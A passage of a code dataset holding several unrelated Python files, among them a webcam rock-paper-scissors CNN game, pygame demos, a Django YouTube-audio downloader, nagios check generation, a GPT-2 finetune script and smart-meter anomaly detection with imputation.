random_state=0,\n test_size=0.2)\n return train_x, test_x, train_y, test_y\n\n\ndef reshapeData(train_x, test_x, train_y, test_y):\n train_y = np_utils.to_categorical(train_y)\n test_y = np_utils.to_categorical(test_y)\n train_x = train_x.reshape(train_x.shape[0], 50, 50, 1)\n test_x = test_x.reshape(test_x.shape[0], 50, 50, 1)\n return train_x, test_x, train_y, test_y\n\n\ndef printInfo(train_x, test_x, train_y, test_y):\n print(\"number of training examples = \" + str(train_x.shape[0]))\n print(\"number of test examples = \" + str(test_x.shape[0]))\n print(\"X_train shape: \" + str(train_x.shape))\n print(\"Y_train shape: \" + str(train_y.shape))\n print(\"X_test shape: \" + str(test_x.shape))\n print(\"Y_test shape: \" + str(test_y.shape))\n\n\ndef main():\n train_x, test_x, train_y, test_y = loadData()\n printInfo(train_x, test_x, train_y, test_y)\n print(len(train_x[0]))\n train_x, test_x, train_y, test_y = reshapeData(train_x, test_x, train_y, test_y)\n printInfo(train_x, test_x, train_y, test_y)\n model, callbacks_list = keras_model(train_x.shape[1], train_x.shape[2])\n model.fit(train_x, train_y, validation_data=(test_x, test_y), epochs=2, batch_size=64,\n callbacks=callbacks_list)\n scores = model.evaluate(test_x, test_y, verbose=1)\n print(\"CNN Error: %.2f%%\" % (100 - scores[1] * 100))\n print_summary(model)\n\n model.save('RPS.h5')\n\n\nif __name__ == '__main__':\n main()\n\n\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nimport os\nfrom random import randint\n\nmodel = load_model('RPS.h5')\n\n\ndef calcResult(pred_class, cpu):\n if pred_class == cpu:\n return 'draw'\n if pred_class == 1 and (cpu == 3):\n return 'user'\n if pred_class == 2 and (cpu == 1 ):\n return 'user'\n if pred_class == 3 and (cpu == 2):\n return 'user'\n return 'cpu'\n\n\ndef main():\n flag = 0\n result = ''\n emojis = get_emojis()\n cap = cv2.VideoCapture(0)\n x, y, w, h = 300, 50, 350, 350\n\n while (cap.isOpened()):\n ret, img = cap.read()\n img = cv2.flip(img, 1)\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n mask2 = cv2.inRange(hsv, np.array([2, 50, 60]), np.array([25, 150, 255]))\n res = cv2.bitwise_and(img, img, mask=mask2)\n gray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)\n median = cv2.GaussianBlur(gray, (5, 5), 0)\n\n kernel_square = np.ones((5, 5), np.uint8)\n dilation = cv2.dilate(median, kernel_square, iterations=2)\n opening = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel_square)\n ret, thresh = cv2.threshold(opening, 30, 255, cv2.THRESH_BINARY)\n\n thresh = thresh[y:y + h, x:x + w]\n contours = cv2.findContours(thresh.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)[1]\n if len(contours) > 0:\n contour = max(contours, key=cv2.contourArea)\n if cv2.contourArea(contour) > 2500:\n if flag == 0:\n cpu = (randint(1,3))\n flag = 1\n x, y, w1, h1 = cv2.boundingRect(contour)\n newImage = thresh[y:y + h1, x:x + w1]\n newImage = cv2.resize(newImage, (50, 50))\n pred_probab, pred_class = keras_predict(model, newImage)\n print(pred_class, pred_probab)\n img = overlay(img, emojis[pred_class], 370, 50, 90, 90)\n img = overlay(img, emojis[cpu], 530, 50, 90, 90)\n result = calcResult(pred_class, cpu)\n\n elif len(contours) == 0:\n flag = 0\n x, y, w, h = 300, 50, 350, 350\n cv2.putText(img, 'USER', (380, 40),\n cv2.FONT_HERSHEY_COMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(img, 'CPU', (550, 40),\n cv2.FONT_HERSHEY_COMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(img, 'Result : ', (420, 170),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n if result == 'user':\n cv2.putText(img, 'USER', (530, 170),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)\n elif result=='cpu':\n cv2.putText(img, 'CPU', (530, 170),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n elif result=='draw':\n cv2.putText(img, 'DRAW', (530, 170),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 2)\n else:\n pass\n cv2.imshow(\"Frame\", img)\n cv2.imshow(\"Contours\", thresh)\n k = cv2.waitKey(10)\n if k == 27:\n break\n\n\ndef keras_predict(model, image):\n processed = keras_process_image(image)\n pred_probab = model.predict(processed)[0]\n pred_class = list(pred_probab).index(max(pred_probab))\n return max(pred_probab), pred_class\n\n\ndef keras_process_image(img):\n image_x = 50\n image_y = 50\n img = cv2.resize(img, (image_x, image_y))\n img = np.array(img, dtype=np.float32)\n img = np.reshape(img, (-1, image_x, image_y, 1))\n return img\n\n\ndef get_emojis():\n emojis_folder = 'RPS_emo/'\n emojis = []\n for emoji in range(len(os.listdir(emojis_folder))):\n print(emoji)\n emojis.append(cv2.imread(emojis_folder + str(emoji) + '.png', -1))\n return emojis\n\n\ndef overlay(image, emoji, x, y, w, h):\n emoji = cv2.resize(emoji, (w, h))\n try:\n image[y:y + h, x:x + w] = blend_transparent(image[y:y + h, x:x + w], emoji)\n except:\n pass\n return image\n\n\ndef blend_transparent(face_img, overlay_t_img):\n # Split out the transparency mask from the colour info\n overlay_img = overlay_t_img[:, :, :3] # Grab the BRG planes\n overlay_mask = overlay_t_img[:, :, 3:] # And the alpha plane\n\n # Again calculate the inverse mask\n background_mask = 255 - overlay_mask\n\n # Turn the masks into three channel, so we can use them as weights\n overlay_mask = cv2.cvtColor(overlay_mask, cv2.COLOR_GRAY2BGR)\n background_mask = cv2.cvtColor(background_mask, cv2.COLOR_GRAY2BGR)\n\n # Create a masked out face image, and masked out overlay\n # We convert the images to floating point in range 0.0 - 1.0\n face_part = (face_img * (1 / 255.0)) * (background_mask * (1 / 255.0))\n overlay_part = (overlay_img * (1 / 255.0)) * (overlay_mask * (1 / 255.0))\n\n # And finally just add them together, and rescale it back to an 8bit integer image\n return np.uint8(cv2.addWeighted(face_part, 255.0, overlay_part, 255.0, 0.0))\n\n\nkeras_predict(model, np.zeros((50, 50, 1), dtype=np.uint8))\nmain()\n\n\n \n","sub_path":"Rock Paper Scissor game.py","file_name":"Rock Paper Scissor game.py","file_ext":"py","file_size_in_byte":9287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"438660778","text":"#this script has the dimension objects\n\nimport pygame, os, sys\nfrom pygame.locals import *\nimport File\n\nimage_path = File.getImagePath()\n\n#set dimensions\nwidth, height = 1080, 640\ndim = (width, height)\nplayerSize = (320, 200)\nmidWidth = (width - playerSize[0]) / 2\nmidHeight = (height - playerSize[1]) / 2\nmidPos = (midWidth, midHeight)\n","sub_path":"Dimension.py","file_name":"Dimension.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"533175789","text":"\"\"\"Add templates\n\nRevision ID: 2b0edcfa57b4\nRevises: 24be36b8c67\nCreate Date: 2015-11-24 17:50:13.280722\n\n\"\"\"\n\nfrom alembic import op\nimport elixir\nimport sqlalchemy as sa\n\nfrom kansha.board.models import create_template_empty, create_template_todo\n\n# revision identifiers, used by Alembic.\nrevision = '2b0edcfa57b4'\ndown_revision = '24be36b8c67'\n\ndef upgrade():\n # Add column\n op.add_column('board', sa.Column('is_template', sa.Boolean, default=False))\n\n # Setup models\n elixir.metadata.bind = op.get_bind()\n elixir.setup_all()\n\n # Create default template\n create_template_empty()\n create_template_todo()\n\n\ndef downgrade():\n op.drop_column('board', 'is_template')\n","sub_path":"kansha/alembic/versions/2b0edcfa57b4_add_templates.py","file_name":"2b0edcfa57b4_add_templates.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"606622090","text":"\"\"\"Numpy based linear regression.\"\"\"\nfrom typing import List\nimport numpy as np\n\nfrom lr import base\n\n\nclass LinearRegressionNumpy(base.LinearRegression):\n \"\"\"Class.\"\"\"\n\n def fit(self, x: List[float], y: List[float]) -> base.LinearRegression:\n \"\"\"Fitting method.\"\"\"\n n = np.size(x)\n mean_x, mean_y = np.mean(x), np.mean(y)\n\n ss_xy = np.sum([y[i] * x[i] for i in range(n)]) - n * mean_y * mean_x\n ss_xx = np.sum([x[i] * x[i] for i in range(n)]) - n * mean_x * mean_x\n\n w = ss_xy / ss_xx\n b = mean_y - w * mean_x\n self._coef = (b, w)\n\n return self\n","sub_path":"l1-tn-kaluzny1995-master/task_5/lr/lr_np.py","file_name":"lr_np.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"571195694","text":"from custom.world_vision.reports import AccordionTTCReport\nfrom custom.world_vision.filters import LocationFilter, WVDatespanFilter\nfrom custom.world_vision.sqldata.child_sqldata import ImmunizationDetailsFirstYear, \\\n ImmunizationDetailsSecondYear, ChildDeworming, ChildRegistrationDetails, ClosedChildCasesBreakdown, \\\n ChildrenDeaths, ChildrenDeathDetails, NutritionMeanMedianBirthWeightDetails, NutritionBirthWeightDetails,\\\n NutritionFeedingDetails, EBFStoppingDetails, ChildHealthIndicators, ChildrenDeathsByMonth\nfrom dimagi.utils.decorators.memoized import memoized\n\n\nclass ChildTTCReport(AccordionTTCReport):\n report_template_path = 'world_vision/accordion_report.html'\n report_title = 'Child Report'\n name = 'Child Report'\n title = 'Child Report'\n slug = 'child_report'\n fields = [WVDatespanFilter, LocationFilter]\n default_rows = 25\n exportable = True\n\n @property\n @memoized\n def data_providers(self):\n config = self.report_config\n return [\n [ChildRegistrationDetails(config=config)],\n [ClosedChildCasesBreakdown(config=config)],\n [ImmunizationDetailsFirstYear(config=config)],\n [ImmunizationDetailsSecondYear(config=config)],\n [\n ChildrenDeaths(config=config),\n ChildrenDeathDetails(config=config),\n ChildrenDeathsByMonth(config=config)\n ],\n [\n NutritionMeanMedianBirthWeightDetails(config=config),\n NutritionBirthWeightDetails(config=config),\n NutritionFeedingDetails(config=config)\n ],\n [EBFStoppingDetails(config=config)],\n [ChildHealthIndicators(config=config)],\n [ChildDeworming(config=config)]\n ]\n","sub_path":"custom/world_vision/reports/child_report.py","file_name":"child_report.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"178455495","text":"# Import pygame module\nimport pygame\n# Initialize pygame\npygame.init()\n# Set initial window size\nwin = pygame.display.set_mode((500, 500))\n# Set caption on display window\npygame.display.set_caption(\"Epic Game\")\n# Initialize character position, width, and height, vel\nx = 50\ny = 50\nwidth = 40\nheight = 60\nvel = 20\n# Main loop that runs while game is running\nrun = True\nwhile run:\n # .1 second timer delay\n pygame.time.delay(100)\n # Loop through every event and check if they have happened\n for event in pygame.event.get():\n # If quit button in top right corner is pressed\n if event.type == pygame.QUIT:\n run = False\n # Checks for key presses\n keys = pygame.key.get_pressed()\n # Checks for left key press\n if keys[pygame.K_LEFT]:\n x -= vel\n # Checks for right key press\n if keys[pygame.K_RIGHT]:\n x += vel\n # Checks for up key press\n if keys[pygame.K_UP]:\n y -= vel\n # Checks for down key press\n if keys[pygame.K_DOWN]:\n y += vel\n #Fill screen with black so your rectangle does not keep drawing\n win.fill((0,0,0))\n # Now draw our pygame rectangle character\n pygame.draw.rect(win, (255, 0, 0), (x,y,width,height))\n # Now we need to update our display\n pygame.display.update() \n\npygame.quit()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"611072360","text":"import datetime\nimport os\n\nfrom charmhelpers.core import hookenv\n\nfrom charms.reactive import hook\nfrom charms.reactive import RelationBase\nfrom charms.reactive import scopes\n\n\nclass LocalMonitorsProvides(RelationBase):\n scope = scopes.GLOBAL\n\n @hook('{provides:local-monitors}-relation-{joined,changed}')\n def changed_local(self):\n self.set_state('{relation_name}.available')\n\n @hook('{provides:local-monitors}-relation-{broken,departed}')\n def broken_local(self):\n self.remove_state('{relation_name}.available')\n\n def add_check(self, args, name=None, description=None, context=None,\n servicegroups=None, unit=None):\n nagios_files = self.get_local('nagios.check.files', [])\n\n if not unit:\n unit = hookenv.local_unit()\n unit = unit.replace('/', '-')\n context = self.get_remote('nagios_host_context', context)\n host_name = self.get_remote('nagios_hostname',\n '%s-%s' % (context, unit))\n\n check_tmpl = \"\"\"\n#---------------------------------------------------\n# This file is Juju managed\n#---------------------------------------------------\ncommand[%(check_name)s]=%(check_args)s\n\"\"\"\n service_tmpl = \"\"\"\n#---------------------------------------------------\n# This file is Juju managed\n#---------------------------------------------------\ndefine service {\n use active-service\n host_name %(host_name)s\n service_description %(description)s\n check_command check_nrpe!%(check_name)s\n servicegroups %(servicegroups)s\n}\n\"\"\"\n check_filename = \"/etc/nagios/nrpe.d/check_%s.cfg\" % (name)\n with open(check_filename, \"w\") as fh:\n fh.write(check_tmpl % {\n 'check_args': ' '.join(args),\n 'check_name': name,\n })\n nagios_files.append(check_filename)\n\n service_filename = \"/var/lib/nagios/export/service__%s_%s.cfg\" % (\n unit, name)\n with open(service_filename, \"w\") as fh:\n fh.write(service_tmpl % {\n 'servicegroups': servicegroups or context,\n 'context': context,\n 'description': description,\n 'check_name': name,\n 'host_name': host_name,\n 'unit_name': unit,\n })\n nagios_files.append(service_filename)\n\n self.set_local('nagios.check.files', nagios_files)\n\n def removed(self):\n files = self.get_local('nagios.check.files', [])\n for f in files:\n try:\n os.unlink(f)\n except Exception as e:\n hookenv.log(\"failed to remove %s: %s\" % (f, e))\n self.set_local('nagios.check.files', [])\n self.remove_state('{relation_name}.removed')\n\n def added(self):\n self.updated()\n\n def updated(self):\n relation_info = {\n 'timestamp': datetime.datetime.now().isoformat(),\n }\n self.set_remote(**relation_info)\n","sub_path":"provides.py","file_name":"provides.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"385788952","text":"from pathlib import Path\nimport json\nimport numpy as np\n\nfrom package.data import datasets, schemas\n\n\ndef test_read_label(tmp_path):\n label_folder = Path(tmp_path, 'label')\n label_folder.mkdir(exist_ok=True, parents=True)\n label_file = Path(label_folder, 'label.csv')\n with open(label_file, 'w') as openfile:\n openfile.write('\\n'.join(['false', 'true']))\n\n label_schema = {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"type\": \"array\",\n \"minItems\": 1,\n \"maxItems\": 1,\n \"items\": [\n {\n \"title\": \"credit__default\",\n \"type\": \"boolean\"\n }\n ],\n \"title\": \"Credit Application Outcome\"\n }\n label_schema_file = Path(tmp_path, 'label.schema.json')\n with open(label_schema_file, 'w') as openfile:\n json.dump(label_schema, openfile)\n\n schema = schemas.from_json_schema(label_schema_file)\n loaded_data = datasets.read_csv_dataset(label_folder, schema)\n assert loaded_data.shape == (2, 1)\n assert isinstance(loaded_data[0][0], np.bool_)\n assert isinstance(loaded_data[1][0], np.bool_)\n","sub_path":"sagemaker_studio/package/tests/package/data/test_datasets.py","file_name":"test_datasets.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"229943660","text":"import numpy as np\nimport csv\nimport cv2\n\n# Common variables to the pipeline\nw = 64\nh = 32\nside_correction = 0.25\n\ndef toRGB(img):\n \"\"\" Needed because the image sent by the simulator is in RGB, not BGR\"\"\"\n return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n\ndef process_img(img):\n \"\"\"image resizing to reduce data size\"\"\"\n crop = img[70:130, :]\n res = cv2.resize(crop, (w, h), interpolation=cv2.INTER_CUBIC)\n return res\n\n\ndef read_data(data_folder, samples_per_bin=100, bins=100):\n \"\"\" Helper function to select what data to use before training the networks\n It takes a data folder, max of samples per bin to to select and\n the number of bins used to balance how distributed angles are\"\"\"\n\n read_lines = []\n\n with open(data_folder + 'driving_log.csv') as csv_file:\n reader = csv.reader(csv_file)\n for line in reader:\n read_lines.append(line)\n lines = np.array(read_lines[1:])\n\n\n # Let's read all angles\n angles_list = []\n for line in lines:\n angles_list.append(float(line[3].strip()))\n angles = np.array(angles_list)\n\n # Selecting final samples to use\n hist = np.histogram(angles, bins=bins)\n used_samples = []\n # make sure extremes are included\n hist[1][-1] += 0.0000001\n bin_start = min(angles)\n # Here we try to balance the samples by setting a maximum per bin\n for bin_end in hist[1][1:]:\n selectable = np.where(np.logical_and(angles >= bin_start, angles < bin_end))\n samples_in_bin = len(angles[selectable])\n if samples_in_bin > samples_per_bin:\n idx = np.random.choice(samples_in_bin, samples_per_bin, replace=False)\n select_from = lines[selectable]\n used_samples.append(select_from[idx])\n else:\n used_samples.append((lines[selectable]))\n bin_start = bin_end\n used_samples = np.concatenate(used_samples)\n\n return used_samples\n\n\ndef get_training_data(lines, data_folder):\n \"\"\"This function takes a list or np array with a line from the log as each element, and the folder for that log\n It returns the full array of images ready for learning, and their value\"\"\"\n images_center = []\n images_left = []\n images_right = []\n measurements = []\n\n for line in lines:\n center_file = line[0].split('/')[-1]\n center_image = cv2.imread(data_folder + 'IMG/' + center_file.strip())\n images_center.append(process_img(toRGB(center_image)))\n measurements.append(float(line[3]))\n flipped = cv2.flip(center_image.copy(), 1)\n images_center.append(process_img(toRGB(flipped)))\n measurements.append(-float(line[3]))\n\n left_file = line[1].split('/')[-1]\n left_image = cv2.imread(data_folder + 'IMG/' + left_file.strip())\n images_left.append(process_img(toRGB(left_image)))\n measurements.append(float(line[3]) + side_correction)\n flipped = cv2.flip(left_image.copy(), 1)\n images_left.append(process_img(toRGB(flipped)))\n measurements.append(-(float(line[3]) + side_correction))\n\n right_file = line[2].split('/')[-1]\n right_image = cv2.imread(data_folder + 'IMG/' + right_file.strip())\n images_right.append(process_img(toRGB(right_image)))\n measurements.append(float(line[3]) - side_correction)\n flipped = cv2.flip(right_image.copy(), 1)\n images_right.append(process_img(toRGB(flipped)))\n measurements.append(-(float(line[3]) - side_correction))\n\n images = images_center + images_left + images_right\n return np.array(images), np.array(measurements)\n\n\ndef generate_train_data(train_lines, data_folder, batch_size):\n samples = batch_size // 6\n while 1:\n # shuffle samples to use\n np.random.shuffle(train_lines)\n # loop to use most of the data\n for i in range(0, len(train_lines) // samples):\n # select lines in this batch\n lines = train_lines[samples*i:samples*(i+1)]\n # get those sample lines and augment them\n X_train_batch, y_train_batch = get_training_data(lines, data_folder)\n yield X_train_batch, y_train_batch\n\n\ndef generate_val_data(val_lines, data_folder):\n while 1:\n # shuffle samples to use\n np.random.shuffle(val_lines)\n for line in val_lines[0:2]:\n center_file = line[0].split('/')[-1]\n center_image = cv2.imread(data_folder + 'IMG/' + center_file.strip())\n angle = np.array([[float(line[3])]])\n yield center_image[None, :, :, :], angle\n\n","sub_path":"data_adaptation.py","file_name":"data_adaptation.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"181671123","text":"from django.shortcuts import render\nfrom downloads.models import Songs, UserHistory\nfrom User.models import User\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\nimport urllib\nimport json\nimport os\nimport youtube_dl\nimport pdb\nfrom cart.models import CartItem\nfrom oauth2.views import index\n\ntry:\n from django.utils import simplejson\nexcept:\n import simplejson\n\nopt = {\n 'format': 'bestaudio/best',\n 'extractaudio': True,\n 'audioformat': \"mp3\",\n 'outtmpl': '%(id)s',\n 'noplaylist': True\n}\n\n\ndef home(request):\n if 'm_id' in request.session:\n details = index(request)\n # details = details[:9]\n user = User.objects.get(id=request.session['m_id'])\n songs = Songs.objects.all().order_by('-id')[:9]\n uc, created = CartItem.objects.get_or_create(user=user)\n if created:\n uc.save()\n csongs = uc.song.all()\n ids = []\n for song in csongs:\n ids.append(song.id)\n lp = \"https://www.youtube.com/watch?v=\"\n if 'dl' in request.GET and request.GET['dl']:\n dl = request.GET['dl']\n lb = dl.split('=')\n if len(lb) == 1:\n dl = lp + dl\n ydl = youtube_dl.YoutubeDL(opt)\n r = None\n url = dl\n cwd = os.getcwd()\n try:\n yl = Songs.objects.get(youtube_link=dl)\n yl.download_count += 1\n yl.save()\n us, created = UserHistory.objects.get_or_create(user=user)\n if created:\n us.save()\n us.song.add(yl)\n return render(request, 'home.html', {'songs': songs})\n except Songs.DoesNotExist:\n try:\n os.chdir('/home/kuliza219/django/ENV/MP3/static/Downloaded Songs')\n with ydl:\n r = ydl.extract_info(url, download=True)\n title = r['title']\n json_data = json.loads(urllib.urlopen(\"https://www.googleapis.com/youtube/v3/videos?id=%s&key=AIzaSyAauLfeOKokwDqETGYcW7ppEP81JWVq15I&part=snippet,statistics\" % r['id']).read())\n thumbnail = json_data['items'][0]['snippet']['thumbnails']['high']['url']\n # statistics = json_data['items'][0]['statistics']\n os.rename(r['id'], \"%s.mp3\" % title)\n d_link = 'Downloaded Songs' + '/' + title + \".mp3\"\n p = Songs(youtube_link=dl, local_link=d_link, title=r['title'], uploader=r['uploader'], \\\n view_count=r['view_count'], like_count=r['like_count'], unlike_count=r['dislike_count'], \\\n download_count=1, thumbnail=thumbnail)\n p.save()\n us, created = UserHistory.objects.get_or_create(user=user)\n if created:\n us.save()\n us.song.add(p)\n os.chdir(cwd)\n return render(request, 'home.html', {'songs': songs, 'name': user.first_name, 'ids': ids, 'utype': user.user_type, 'details': details})\n except Exception:\n return render(request, 'home.html', {'songs': songs, 'name': user.first_name, 'error': True, 'ids': ids, 'utype': user.user_type, 'details': details})\n else:\n return render(request, 'home.html', {'songs': songs, 'name': user.first_name, 'ids': ids, 'utype': user.user_type, 'details': details})\n else:\n return HttpResponseRedirect('/')\n\n\ndef temp(request):\n total_data = Songs.objects.all().count()\n user = User.objects.get(id=request.session['m_id'])\n if 'count' in request.GET and request.GET['count']:\n c = request.GET['count']\n t = int(c)\n if t-3 < total_data:\n temps = Songs.objects.all().order_by('-id')[:t]\n songs = temps[t-3:t]\n return render(request, 'temp.html', {'songs': songs, 'utype': user.user_type})\n else:\n raise Http404\n else:\n raise Http404\n\n\ndef loginhome(request):\n if 'm_id' in request.session:\n return HttpResponseRedirect('/home')\n else:\n songs = Songs.objects.all().order_by('-id')[:9]\n context = {'songs': songs}\n template = 'loginhome.html'\n return render(request, template, context)\n\n\n\ndef search(request):\n if request.is_ajax():\n search_qs = Songs.objects.filter(title__icontains=request.GET['term'])\n results = []\n for r in search_qs:\n r_json = {}\n r_json['id'] = r.id\n r_json['label'] = r.title\n r_json['value'] = r.title\n results.append(r_json)\n data = json.dumps(results)\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n else:\n songs = Songs.objects.filter(title__icontains=request.GET['search'])\n context = {'songs': songs, 'res': True}\n template = 'home.html'\n return render(request, template, context)\n\n\n\n","sub_path":"MP3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"177880292","text":"import gpt_2_simple as gpt2\n\nmodel_name = \"774M\"\ngpt2.download_gpt2(model_name=model_name) # model is saved into current directory under /models/124M/\n\nsess = gpt2.start_tf_sess()\ngpt2.finetune(sess,\n 'cleaned_summaries.txt',\n model_name=model_name,\n multi_gpu=True,\n sample_length=140,\n sample_num=10,\n steps=10001) # steps is max number of training steps\n\n","sub_path":"gp.py","file_name":"gp.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"612391540","text":"\"\"\"\nAnomaly detection\n and fwd-bwd joint imputation\n\n2020. 10. 20. Tue.\nSoyeong Park\n\"\"\"\nfrom funcs_ETRI import *\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\n\n\n##############################\n# 0. parameter setting\ndir_data = 'D:/2020_ETRI/data' # SG_data, label data, calendar 디렉토리를 포함하고 있는 경로\nlocation = '서울' # 광주, 나주, 대전, 서울, 인천, label\ntest_apt = '1120011200'\ntest_house = 'fa7caf27'\n\nf_fwd, f_bwd = 24, 24\nnan_len = 3\n\n\n##############################\n# 1. load dataset\ndata_raw = load_apt(dir_data, location, test_apt)\ndata, nan_data = clear_head(data_raw)\ndata_col = data[test_house]\ncalendar = load_calendar(2017, 2019)\ndf = pd.DataFrame([], index=data_col.index)\ndf['values'] = data_col.copy()\ndf['holiday'] = calendar[data_col.index[0]:data_col.index[-1]]\ndf['nan'] = chk_nan_bfaf(data_col)\n\n##############################\n# 2. injection\ndf['injected'], df['mask_inj'] = inject_nan_acc3(data_col, p_nan=1, p_acc=0.25)\n\n\n##############################\n# 3. accumulation detection\nidx_list = np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))[0]\nsample_list = list()\nfor i in range(len(idx_list)):\n idx_target = idx_list[i]\n sample, _, _ = nearest_neighbor(data_col, df['nan'].copy(), idx_target, calendar)\n sample_list.append(sample)\ndetect_sample = pd.DataFrame(sample_list)\n\n# 3-2. z-score\ncand = df[(df['mask_inj'] == 3) | (df['mask_inj'] == 4)].copy()\nz_score = (cand['injected'].values - detect_sample.mean(axis=1)) / detect_sample.std(axis=1)\ndf['z_score'] = pd.Series(z_score.values, index=df.index[np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))[0]])\n\ndetection_result = pd.DataFrame([], columns=['thld', 'MAE', 'MAE_no'])\ni = 0\nfor thld in np.arange(0, 40, 0.1):\n # detection\n idx_detected_nor = np.where(((df['mask_inj'] == 3) | (df['mask_inj'] == 4)) & (df['z_score'] < thld))[0]\n idx_detected_acc = np.where(((df['mask_inj'] == 3) | (df['mask_inj'] == 4)) & (df['z_score'] > thld))[0]\n detected = np.zeros(len(data_col))\n detected[np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))] = 3\n detected[idx_detected_acc.astype('int')] = 4\n\n # imputation\n imp_const = df['injected'].copy()\n imp_no = df['injected'].copy()\n # normal imputation - idx_detected_nor\n for idx in idx_detected_nor:\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = df['mask_inj'][idx:idx+4]\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=f_fwd, f_len_bwd=f_bwd)\n imp_const[idx+1:idx+4] = fcst_bidirec1\n imp_no[idx+1:idx+4] = fcst_bidirec1\n\n # acc. imputation - idx_detected_acc\n for idx in idx_detected_acc:\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = 2\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=f_fwd, f_len_bwd=f_bwd, n_len=4)\n acc = data_inj_temp[idx]\n fcst_bidirec1 = fcst_bidirec1*(acc/sum(fcst_bidirec1))\n imp_const[idx:idx+4] = fcst_bidirec1\n # acc. imputation - no constraints\n for idx in idx_detected_acc:\n data_inj_temp = data_col.copy()\n data_inj_temp[idx:idx+4] = df['injected'][idx:idx+4]\n mask_inj_temp = np.isnan(data_col).astype('float')\n mask_inj_temp[idx:idx+4] = df['mask_inj'][idx:idx+4]\n trn_x, trn_y, tst_x = make_bidirectional_input(data_inj_temp, mask_inj_temp)\n fcst_bidirec1, _ = linear_prediction(trn_x, trn_y, tst_x, f_len_fwd=f_fwd, f_len_bwd=f_bwd, n_len=3)\n imp_no[idx+1:idx+4] = fcst_bidirec1\n\n # accuracy\n temp = pd.DataFrame({'values': data_col, 'imp_const': imp_const, 'imp_no': imp_no}).dropna()\n detection_result.loc[i] = [thld,\n mean_absolute_error(temp['values'], temp['imp_const']),\n mean_absolute_error(temp['values'], temp['imp_no'])]\n i += 1\n\nplt.figure()\nplt.plot(detection_result['thld'], detection_result['MAE'])\nplt.plot(detection_result['thld'], detection_result['MAE_no'])\nplt.legend(['w/ const.', 'w/o const.'], loc='lower right')\nplt.xlabel('z-score threshold')\nplt.ylabel('total MAE')\nplt.title(f'{test_house}')\nplt.tight_layout()\nplt.show()\n\nthreshold = detection_result['thld'][detection_result['MAE']==detection_result['MAE'].min()].values[0]\nprint(f'** SELECTED THRESHOLD: {threshold}')\n\n\n# 3-3. detection\nidx_detected_nor = np.where(((df['mask_inj'] == 3) | (df['mask_inj'] == 4)) & (df['z_score'] < threshold))[0]\nidx_detected_acc = np.where(((df['mask_inj'] == 3) | (df['mask_inj'] == 4)) & (df['z_score'] > threshold))[0]\ndetected = np.zeros(len(data_col))\ndetected[np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))] = 3\ndetected[idx_detected_acc.astype('int')] = 4\ndf['mask_detected'] = detected\n\nidx_injected = np.where((df['mask_inj'] == 3) | (df['mask_inj'] == 4))[0]\nidx_real_nor = np.where(df['mask_inj'] == 3)[0]\nidx_real_acc = np.where(df['mask_inj'] == 4)[0]\n\nidx_detected = np.isin(idx_injected, idx_detected_acc)\nidx_real = np.isin(idx_injected, idx_real_acc)\ncm = confusion_matrix(idx_real, idx_detected)\n\nplt.rcParams.update({'font.size': 14})\nplt.figure()\nsns.heatmap(cm, annot=True, fmt='d', annot_kws={'size': 20}, square=True, cmap='Greys', # 'gist_gray': 